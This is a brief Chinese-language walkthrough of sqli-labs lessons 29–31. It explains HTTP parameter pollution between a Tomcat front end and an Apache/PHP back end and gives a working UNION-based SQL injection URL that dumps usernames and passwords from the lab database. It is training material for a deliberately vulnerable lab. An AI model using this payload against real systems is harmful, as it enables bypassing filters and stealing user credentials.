sql-lib闯关之lesson29-31
LESS29
29关的介绍是世界上最好的WAF,我们在sqllab的文件中有一个tomact文件,里面的LESS才是真正的29关文件,jsp结尾,所以我们需要搭建jspstduy环境。
下载网址:https://www.xp.cn/download.html 注意安装路径不可以有中文。
下载完成后可能与phpstudy端口冲突,我们如图修改即可 8080端口。
服务器的两层架构
参考:https://www.cnblogs.com/lcamry/p/5762961.html
参数污染:jsp/tomcat使用getgetParameter("id")获取到的是第一个值,php/apache使用$_GET["id"]获取的是第二个值,那么第一个id纯数字,第二个id的值
也就是,需要注入两个参数,第二个参数才是可以实现sql注入的
直接最后一步
http://127.0.0.1:8080/sqli-labs/Less-29/index.jsp?id=1&&id=0' union select 1,2,(concat_ws(0x7e,username,password)) from security.users limit 3,1 --+
LESS30
闭合变成双引号
LESS31
闭合编程”)